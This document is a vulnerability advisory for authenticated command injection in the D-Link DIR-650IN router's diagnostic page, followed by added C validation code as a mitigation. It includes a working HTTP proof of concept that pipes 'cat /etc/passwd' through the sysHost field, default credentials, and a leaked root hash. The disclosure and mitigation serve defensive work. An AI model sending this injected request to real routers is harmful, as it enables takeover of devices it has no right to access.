# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
# Date: 2023-01-08
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
# Version: Firmware V1.04 (REQUIRED)
# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
# CVE: N/A (Version included now, previously missing)

Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to authenticated command injection in the Diagnostic (Ping / Traceroute) functionality. The sysHost parameter is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.

Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.

HTTP PoC:
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded

submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply

Response Extract:
root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
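
Mitigation sketch (an added example, not part of the original advisory and not D-Link firmware code): a C allowlist check of the kind the handler for sysHost lacks, plus an argument vector that keeps the host out of any shell. The function names is_valid_diag_host and build_ping_argv and the 1-10 count limit are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allowlist check for a diagnostic target: an RFC 1123 style hostname or
 * dotted IPv4 literal. Labels are 1-63 letters, digits or '-', separated by
 * single dots, never starting or ending with '-'; total length 1-253.
 * Returns 1 if acceptable, 0 otherwise. */
int is_valid_diag_host(const char *host)
{
    size_t len, i, label_len = 0;

    if (host == NULL) return 0;
    len = strlen(host);
    if (len == 0 || len > 253) return 0;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == '.') {
            if (label_len == 0 || host[i - 1] == '-') return 0;
            label_len = 0;
        } else if (c == '-') {
            if (label_len == 0) return 0;  /* also blocks "-option" values */
            label_len++;
        } else if (c < 128 && isalnum(c)) {
            label_len++;
        } else {
            return 0;  /* '|', ';', '&', '$', '`', spaces, quotes, ... */
        }
        if (label_len > 63) return 0;
    }
    return label_len > 0 && host[len - 1] != '-';
}

/* Hypothetical helper: fill argv for execvp("ping", (char *const *)argv) so
 * the host is one argument and no shell parses it. Returns 0, or -1 if the
 * host or count is rejected (count is limited to 1-10 here by assumption). */
int build_ping_argv(const char *host, int count,
                    char *count_buf, size_t count_len, const char *argv[5])
{
    if (!is_valid_diag_host(host) || count < 1 || count > 10) return -1;
    snprintf(count_buf, count_len, "%d", count);
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = count_buf;
    argv[3] = host;
    argv[4] = NULL;
    return 0;
}
```

The value from step 4 above is rejected at the first space or '|', while plain hostnames and IPv4 addresses pass unchanged.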